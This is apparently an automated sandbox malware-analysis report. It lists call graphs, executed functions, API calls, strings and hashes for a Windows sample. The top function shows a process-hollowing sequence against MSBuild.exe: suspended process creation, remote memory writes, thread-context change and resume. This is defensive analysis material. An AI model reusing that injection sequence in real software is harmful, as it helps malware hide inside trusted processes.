23076 112eeb 23074->23076 23077 112f0f 23075->23077 23079 11e4f5 __fread_nolock 43 API calls 23075->23079 23078 111b24 __dosmaperr 14 API calls 23076->23078 23077->23053 23080 112ef0 23078->23080 23081 112f0c 23079->23081 23082 112249 ___std_exception_copy 29 API calls 23080->23082 23081->23053 23083 112efb 23082->23083 23083->23053 23087 10f509 LeaveCriticalSection 23084->23087 23086 112edd 23086->23057 23087->23086 23089 10b032 23088->23089 23090 10b0ae 23088->23090 23097 8bb30 23089->23097 23114 889b0 23090->23114 23096 10b04e _Yarn _Deallocate 23096->23061 23098 8d251 23097->23098 23099 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 23098->23099 23100 8d598 23099->23100 23101 8d5b0 23100->23101 23111 8d610 23101->23111 23102 8ef93 23103 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 23102->23103 23105 92b6f 23103->23105 23104 10917c 8 API calls std::_Facet_Register 23104->23111 23105->23096 23106 92b7b 23107 112259 29 API calls 23106->23107 23108 90a00 23107->23108 23112 92b90 6 API calls 23108->23112 23109 8d92e 23110 10917c 8 API calls std::_Facet_Register 23109->23110 23110->23109 23111->23102 23111->23104 23111->23106 23111->23108 23111->23109 23113 92b85 23112->23113 23115 109b41 std::_Xinvalid_argument 30 API calls 23114->23115 23116 889ba 23115->23116 24254 10f5f0 24255 112ab6 ___scrt_uninitialize_crt 68 API calls 24254->24255 24256 10f5f8 24255->24256 24264 119742 24256->24264 24258 10f5fd 24259 1197ed 14 API calls 24258->24259 24260 10f60c DeleteCriticalSection 24259->24260 24260->24258 24261 10f627 24260->24261 24262 116eff ___free_lconv_mon 14 API calls 24261->24262 24263 10f632 24262->24263 24265 11974e ___scrt_is_nonwritable_in_current_image 24264->24265 24274 112551 EnterCriticalSection 24265->24274 24267 119759 24268 1197c5 24267->24268 24271 119799 DeleteCriticalSection 24267->24271 24272 11290e 69 API calls 24267->24272 24275 1197e4 24268->24275 24273 116eff ___free_lconv_mon 14 API calls 24271->24273 24272->24267 24273->24267 24274->24267 24278 112568 LeaveCriticalSection 24275->24278 24277 1197d1 24277->24258 24278->24277 20729 8d5fe 20739 8d610 20729->20739 20730 8ef93 20731 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20730->20731 20733 92b6f 20731->20733 20732 10917c 8 API calls std::_Facet_Register 20732->20739 20734 92b7b 20742 112259 20734->20742 20736 90a00 20747 92b90 20736->20747 20737 8d92e 20738 10917c 8 API calls std::_Facet_Register 20737->20738 20738->20737 20739->20730 20739->20732 20739->20734 20739->20736 20739->20737 20743 112498 ___std_exception_copy 29 API calls 20742->20743 20744 112268 20743->20744 20745 112276 __Getctype 11 API calls 20744->20745 20746 112275 20745->20746 20748 92d9c 20747->20748 20753 92f00 20748->20753 20752 92eff 20754 935a0 20753->20754 20755 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20754->20755 20756 92ef4 20755->20756 20757 10c2fc 20756->20757 20758 10c343 RaiseException 20757->20758 20759 10c316 20757->20759 20758->20752 20759->20758

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0013218D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,001320FF,001320EF), ref: 00132323
                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00132336
                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00132354
                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(000000F4,?,00132143,00000004,00000000), ref: 00132378
                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(000000F4,?,?,00003000,00000040), ref: 001323A3
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000000F4,00000000,?,?,00000000,?), ref: 001323FB
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000000F4,00400000,?,?,00000000,?,00000028), ref: 00132446
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000000F4,?,?,00000004,00000000), ref: 00132484
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000094,042E0000), ref: 001324C0
                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000094), ref: 001324CF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                                                                                                  • Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                                                                                                                                  • Instruction ID: bec9a3907c83cb4162cb30568acc963ae7072d2520a8371f0e6f6bf0d4a28922
                                                                                                                                                                                  • Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 61B1F77660064AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB341D774FA51CB94
                                                                                                                                                                                  Function 00064B90 Relevance: 13.5, APIs: 2, Strings: 2, Instructions: 6535COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 95 64b90-64d78 96 64d7e 95->96 97 650b8-650be 95->97 98 65110-65116 96->98 99 650c4-650ca 97->99 100 656b0-656b6 97->100 101 65c10-65c16 98->101 102 6511c-65122 98->102 105 662e6-662ec 99->105 106 650d0-650d6 99->106 103 66655-6665b 100->103 104 656bc-656c2 100->104 107 66683-66689 101->107 108 65c1c-65c22 101->108 109 6662c-66632 102->109 110 65128-6512e 102->110 115 66661-66667 103->115 116 6862e-6864a call 61590 103->116 113 66d30-66d39 104->113 114 656c8-656ce 104->114 111 662f2-662f8 105->111 112 67348-6756d 105->112 117 64d83-650ad call 61590 106->117 118 650dc-650e2 106->118 125 68655-68ac8 107->125 126 6668f-66695 107->126 123 66d6f-66d8c 108->123 124 65c28-65c2e 108->124 133 6826b-68288 109->133 134 66638-6663e 109->134 127 65134-6513a 110->127 128 66cfc-66d0e 110->128 129 662fe-66304 111->129 130 67d59-68263 VirtualProtect 111->130 131 67570-67576 112->131 138 66d3e-66d47 113->138 135 656d4-656da 114->135 136 66d52-66d64 114->136 119 650b0-650b6 115->119 120 6666d-66678 115->120 116->97 176 68650 116->176 117->119 121 66c96-66cba 118->121 122 650e8-650ee 118->122 119->97 119->98 120->97 149 6667e 120->149 154 66cbf-66cc2 121->154 122->119 150 650f0-65102 122->150 123->97 177 66d92 123->177 140 66d97-6733d 124->140 141 65c34-65c3a 124->141 125->97 142 68ace 125->142 126->119 151 6669b-66c80 126->151 152 65140-65146 127->152 153 66d19-66d2e 127->153 128->97 155 66d14 128->155 129->119 143 6630a-66627 129->143 130->133 144 675c0-675c6 131->144 145 67578-6757e 131->145 133->97 189 6828e 133->189 147 66644-6664a 134->147 148 68293-68623 134->148 135->119 156 656e0-65c08 135->156 136->97 139 66d6a 136->139 138->97 158 66d4d 138->158 139->98 162 67343 140->162 163 68eb0-68eb5 140->163 141->119 159 65c40-662ca 141->159 142->98 160 68e70-68e75 142->160 164 66c82-66c8b 143->164 168 694ae-69a8c call 61590 FreeConsole call 51000 * 2 call 63b60 144->168 169 675cc-675d2 144->169 165 67974-67d4e GetPEB 145->165 166 67584-6758a 145->166 147->119 167 66650-69b15 call 1091e8 147->167 148->97 174 68629 148->174 149->98 150->97 170 65104-6510e 150->170 151->164 152->119 171 6514c-656a4 152->171 153->138 154->154 173 66cc4-66ce2 154->173 155->98 175 662cc-662db 156->175 158->98 159->175 160->163 179 68e77-68e7c 160->179 162->179 183 69a97-69af7 call 61590 call 51000 * 2 call 63b60 163->183 184 68ebb-68ec0 163->184 164->97 187 66c91 164->187 165->145 186 67d54 165->186 166->131 180 6758c-675b0 GetPEB 166->180 168->97 212 69a92 168->212 169->131 185 675d4-67969 169->185 170->98 171->97 188 656aa 171->188 174->98 175->97 178 662e1 175->178 176->125 177->98 178->98 191 68ec7-694a7 GetPEB 179->191 192 68e7e-68e83 179->192 180->145 193 675b2-675bc 180->193 183->97 216 69afd 183->216 184->160 195 68ec2 184->195 185->145 196 6796f 185->196 186->144 187->98 188->98 189->98 191->168 192->160 199 68e85-68ea8 GetPEB 192->199 193->144 196->144 199->179 202 68eaa 199->202 202->163 212->98 216->98
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: x2f$x2f
                                                                                                                                                                                  • API String ID: 0-3727408268
                                                                                                                                                                                  • Opcode ID: 675a4e8a916d998123bbd011df9c6b02ba7e6928577ca9a5ebad6487ea828a50
                                                                                                                                                                                  • Instruction ID: a4b9622fa7c14940f0a0c73110619b6ffd2974907dd00dc122edcc34922138f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 675a4e8a916d998123bbd011df9c6b02ba7e6928577ca9a5ebad6487ea828a50
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA83FB7BFA19100BFB48C47A8CA63EB47C347E5315F1FE43A4959D7256DCAF884A4A80
                                                                                                                                                                                  Function 000E4A10 Relevance: 12.4, Strings: 4, Instructions: 7372COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Z 2$Z 2$Z 2$Z 2
                                                                                                                                                                                  • API String ID: 0-1978169933
                                                                                                                                                                                  • Opcode ID: 73eedf7d610a496adaac021221a966b9f1932e82c4aead6e30547d2747626832
                                                                                                                                                                                  • Instruction ID: 3415567ff82eda10247807aa0318310cd8e993c03c5fb0e7bb6fb92e64d327bc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73eedf7d610a496adaac021221a966b9f1932e82c4aead6e30547d2747626832
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5931B7BBA19100FFB48887A88EA3E757C347E5314F1FE43E4959D7252DCAF884A5A40
                                                                                                                                                                                  Function 000ADFE0 Relevance: 9.9, Strings: 4, Instructions: 4894COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 364 adfe0-ae009 365 ae010-ae015 364->365 366 ae01b-ae020 365->366 367 ae700-ae705 365->367 368 ae022-ae027 366->368 369 ae046-ae6de 366->369 370 ae743-aeb41 367->370 371 ae707-ae70c 367->371 373 ae02d-ae032 368->373 374 ae6e0-ae6f2 368->374 375 ae734-ae73c 369->375 370->367 372 aeb47 370->372 376 aeb4c-aeb6e 371->376 377 ae712-ae717 371->377 372->376 373->365 381 ae034-ae03e 373->381 374->366 382 ae6f8 374->382 375->367 378 ae73e 375->378 379 aefec-aeff2 376->379 380 aeb74 376->380 377->365 383 ae71d-ae72c 377->383 386 aeff8-aeffe 379->386 387 af3f0-af3f6 379->387 384 b0760-b0766 380->384 381->367 385 ae044 381->385 382->367 383->375 388 b076c-b0772 384->388 389 b0ee0-b0ee6 384->389 385->366 390 af42a-af430 386->390 391 af004-af00a 386->391 392 af3fc-af402 387->392 393 afdd6-afddc 387->393 396 b0778-b077e 388->396 397 b1371-b1377 388->397 402 b0eec-b0ef2 389->402 403 b13b6-b13bc 389->403 398 af436-af43c 390->398 399 b02a4-b0729 390->399 404 af010-af016 391->404 405 afe04-b029f 391->405 394 af408-af40e 392->394 395 aeb79-aefdc 392->395 400 afde2-afde8 393->400 401 b0731-b0737 393->401 406 aefe0-aefe6 394->406 407 af414-af41f 394->407 395->406 410 b13d3-b187c 396->410 411 b0784-b078a 396->411 419 b137d-b1383 397->419 420 b189c-b18c8 397->420 398->406 412 af442-afdcb 398->412 399->379 418 b072f 399->418 400->406 413 afdee-afdf9 400->413 440 b073b call 10a300 401->440 441 b073b call 10a2f2 401->441 442 b073b call 10a2e2 401->442 414 b0ef8-b0efe 402->414 415 b1886-b1891 402->415 408 b18d3-b18de 403->408 409 b13c2-b13c8 403->409 404->406 416 af018-af3d8 404->416 417 b135d-b1366 405->417 406->379 406->384 407->379 427 af425 407->427 408->379 433 b18e4 408->433 409->406 428 b13ce-b1901 call 1091e8 409->428 410->415 411->406 422 b0790-b0ecf 411->422 412->379 429 afdd1 412->429 413->379 431 afdff 413->431 414->406 423 b0f04-b135b 414->423 415->379 430 b1897 415->430 416->379 424 af3de 416->424 417->379 425 b136c 417->425 418->384 419->406 426 b1389-b13ab 419->426 420->379 432 b18ce 420->432 421 b073e-b074d 421->379 434 b0753-b075d 421->434 422->379 435 b0ed5 422->435 423->417 424->384 425->384 426->379 436 b13b1 426->436 427->384 429->384 430->384 431->384 432->384 433->384 434->384 435->384 436->384 440->421 441->421 442->421
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: h-A$h-A$h-A$h-A
                                                                                                                                                                                  • API String ID: 0-2562380149
                                                                                                                                                                                  • Opcode ID: a93a1c477fd3f8c6f64a180fc52aac460098f13a692656877f85224631373ff3
                                                                                                                                                                                  • Instruction ID: 0875a8b25b8e77acb942e9282b69eec83a4b4d3d4fca340fa135831c53e18ac5
                                                                                                                                                                                  • Opcode Fuzzy Hash: a93a1c477fd3f8c6f64a180fc52aac460098f13a692656877f85224631373ff3
                                                                                                                                                                                  • Instruction Fuzzy Hash: B053E97BFA19100BFB48C87A8CA63E747C347E5714F1FE43E4999D7255DCAE884A4A80
                                                                                                                                                                                  Function 0008D5B0 Relevance: 7.4, Instructions: 7449COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 551 8d5b0-8d5fc 552 8d610-8d618 551->552 553 8d61e-8d623 552->553 554 8d900-8d905 552->554 555 8d629-8d62e 553->555 556 8ddf0-8ddf5 553->556 557 8d90b-8d910 554->557 558 8e280-8e285 554->558 563 8e7e4-8e7ed 555->563 564 8d634-8d639 555->564 559 8ef7b-8ef80 556->559 560 8ddfb-8de00 556->560 565 8e2ac-8e2b1 557->565 566 8d916-8d91b 557->566 561 8e28b-8e290 558->561 562 926e3-926f0 558->562 578 90099-900a1 559->578 579 8ef86-8ef8d 559->579 567 92115-92122 560->567 568 8de06-8de0d 560->568 569 926f5-926fa 561->569 570 8e296-8e29d 561->570 562->552 563->552 575 8e7f3-8e7fa 563->575 571 8d63f-8d646 564->571 572 92127-926de 564->572 573 916cd-91c97 565->573 574 8e2b7-8e2be 565->574 576 8d921-8d928 566->576 577 90a05-90c27 566->577 567->552 568->552 580 8de13-8e274 568->580 569->552 570->552 581 8e2a3-8e2a7 570->581 571->552 588 8d648-8d8ea 571->588 572->552 573->552 574->552 582 8e2c4-8e7df 574->582 575->552 583 8e800-8ef76 575->583 576->552 589 8d92e-8ddd7 576->589 584 90c2d 577->584 585 91017-9101c 577->585 587 900a6-900ab 578->587 579->552 586 8ef93-92b7a call 1091e8 579->586 580->552 581->552 582->552 583->552 597 91050-91055 584->597 590 9102a-91040 call 10917c 585->590 591 9101e-91023 585->591 593 900db-900e0 587->593 594 900ad-900b2 587->594 595 8d8f0 588->595 596 8fbc7-8fbcc 588->596 598 8dddd 589->598 599 8f177-8f17c 589->599 590->585 640 91042-9104c 590->640 603 91010-91015 591->603 604 91025-92110 591->604 610 909ea-909ef 593->610 611 900e6-904c2 593->611 605 900b8-900bd 594->605 606 926ff-92b5f 594->606 614 8fc00-8fc05 595->614 600 8fbda-8fbf0 call 10917c 596->600 601 8fbce-8fbd3 596->601 612 9105b-91060 597->612 613 90c32-9100d 597->613 615 8f1b0-8f1b5 598->615 608 8f18a-8f1a0 call 10917c 599->608 609 8f17e-8f183 599->609 600->596 649 8fbf2-8fbfc 600->649 616 8fbc0-8fbc5 601->616 617 8fbd5-92102 601->617 603->585 603->597 604->552 605->587 625 900bf-900d9 605->625 606->552 608->599 652 8f1a2-8f1ac 608->652 627 8f170-8f175 609->627 628 8f185 609->628 620 92b7b call 112259 610->620 621 909f5-909fa 610->621 629 90678-9067e 611->629 630 904c8 611->630 612->603 632 91062-916c2 call 10917c 612->632 613->603 622 8f769-8fbbb 614->622 623 8fc0b-8fc10 614->623 633 8ef98-8f16b 615->633 634 8f1bb-8f1c0 615->634 616->596 616->614 617->552 650 92b80-92b85 call 92b90 620->650 621->587 638 90a00 621->638 622->616 623->616 639 8fc12-8fc16 call 10917c 623->639 625->593 625->594 627->599 627->615 628->608 644 9068d-906a3 call 10917c 629->644 645 90680-90686 629->645 641 906b0-906b6 630->641 632->585 661 916c8 632->661 633->627 634->627 646 8f1c2-8f75e call 10917c 634->646 638->650 660 8fc1b-9008e 639->660 640->597 647 904cd-9066f 641->647 648 906bc-906c2 641->648 644->629 669 906a5-906af 644->669 654 90688-909df 645->654 655 90670-90676 645->655 646->599 670 8f764 646->670 647->655 648->655 658 906c4-909a8 call 10917c 648->658 649->614 652->615 654->594 666 909e5 654->666 655->629 655->641 658->629 672 909ae 658->672 660->596 668 90094 660->668 661->597 666->593 668->614 669->641 670->615 672->641
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 049147c8acc5bd9a3d8865e22bdc51c0aa5f26fa0bdc62bad521bb2164513038
                                                                                                                                                                                  • Instruction ID: ff687710e622ad7158c613b42e5c0882fd4f833486e3b3c731ecdd291f40a699
                                                                                                                                                                                  • Opcode Fuzzy Hash: 049147c8acc5bd9a3d8865e22bdc51c0aa5f26fa0bdc62bad521bb2164513038
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA930A7BBA15100BFB48887A88EA3E757C347E5314F1FF43A4999C7252DCAF884A5B44
                                                                                                                                                                                  Function 000B1910 Relevance: 5.6, Strings: 3, Instructions: 1812COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 673 b1910-b1deb 674 b1df0-b1df5 673->674 675 b1e20-b1e25 674->675 676 b1df7-b1dfc 674->676 679 b1e2b-b1e30 675->679 680 b2430-b244c 675->680 677 b1dfe-b1e03 676->677 678 b1e60-b1e65 676->678 681 b1e09-b1e0e 677->681 682 b200c-b201b call 10a770 677->682 685 b1e6b-b1e70 678->685 686 b2985-b2e0a 678->686 683 b2457-b297a 679->683 684 b1e36-b1e3b 679->684 680->676 696 b2452 680->696 681->674 687 b1e10-b2e33 call 1091e8 681->687 694 b201e-b2425 682->694 683->676 690 b2980 683->690 684->674 689 b1e3d-b1e59 684->689 685->674 692 b1e76-b2001 685->692 686->676 691 b2e10 686->691 689->676 700 b1e5b 689->700 690->675 691->675 692->676 693 b2007 692->693 693->675 694->676 697 b242b 694->697 696->675 697->675 700->675
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: vV$vV$vV
                                                                                                                                                                                  • API String ID: 0-262125976
                                                                                                                                                                                  • Opcode ID: c753194fd63b8189cea661e7f02e6912ab80af2f6d1ce3e0c96605f15eabff3d
                                                                                                                                                                                  • Instruction ID: 9c20e44ca6c85d1085f8e850505a1b40f66781cbc5631ee28f28dcb4c9bb689c
                                                                                                                                                                                  • Opcode Fuzzy Hash: c753194fd63b8189cea661e7f02e6912ab80af2f6d1ce3e0c96605f15eabff3d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4B2187BFA19101BEB4CC87A8CB63E757C347E5314F2AE43E595AC7281DC6F884A5A40
                                                                                                                                                                                  Function 0008D5FE Relevance: .6, Instructions: 642COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b32f0ccd6269c11021a3213554d3494967106efaea983c6c8d0590173ceb0f2f
                                                                                                                                                                                  • Instruction ID: 4ebfcb2c7a9d9c3baba68e051d3db7e1d376ccabc6a69a7e834b6553f64a1722
                                                                                                                                                                                  • Opcode Fuzzy Hash: b32f0ccd6269c11021a3213554d3494967106efaea983c6c8d0590173ceb0f2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A202266BBA15010FFB48887ACCEA3D75BC347E6305F1EE83A4599C7252DCAF844A5A44
                                                                                                                                                                                  Function 00122A39 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00122E3E: CreateFileW.KERNELBASE(00000000,00000000,?,00122AE2,?,?,00000000,?,00122AE2,00000000,0000000C), ref: 00122E5B
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00122B4D
                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00122B54
                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 00122B60
